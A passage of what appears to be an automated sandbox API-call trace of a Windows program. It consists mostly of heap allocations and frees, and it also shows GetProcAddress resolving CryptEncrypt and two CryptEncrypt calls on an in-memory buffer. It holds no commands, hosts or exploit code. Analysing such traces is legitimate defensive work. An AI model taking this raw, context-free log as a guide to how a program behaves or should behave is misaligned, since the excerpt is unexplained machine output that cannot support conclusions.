hHeap=0x2af0000) returned 1 [0087.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0087.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0087.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0087.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0087.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0087.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0087.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0087.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0087.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0087.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0087.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0087.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0087.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a94ec0 | out: hHeap=0x2af0000) returned 1 [0087.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0087.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.869] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0087.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0087.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9d60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0087.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.870] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0087.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0087.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0087.870] CryptEncrypt (in: hKey=0x9a3ec0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x8f23, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8f28) returned 1 [0087.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0087.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0087.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0087.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0087.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.871] CharLowerBuffW (in: lpsz="byte[36648]", cchLength=0xb | out: lpsz="byte[36648]") returned 0xb [0087.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.872] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.872] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b20 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.873] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0087.873] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0087.873] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.873] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0087.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7160 [0087.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69b80 [0087.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0087.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0087.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0087.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0087.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0087.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0087.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0087.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0087.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8f23) returned 0x37c0048 [0087.875] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0087.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0087.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0087.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd) returned 0x2aa9e80 [0087.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9e80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0087.876] CryptEncrypt (in: hKey=0x9a3ec0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a94ec0*, pdwDataLen=0x8cef60*=0x8f23, dwBufLen=0x8f28 | out: pbData=0x2a94ec0*, pdwDataLen=0x8cef60*=0x8f28) returned 1 [0087.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0087.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0087.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0087.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0087.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0087.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0087.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0087.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0087.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0087.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0087.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0087.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0087.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0087.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0087.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0087.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 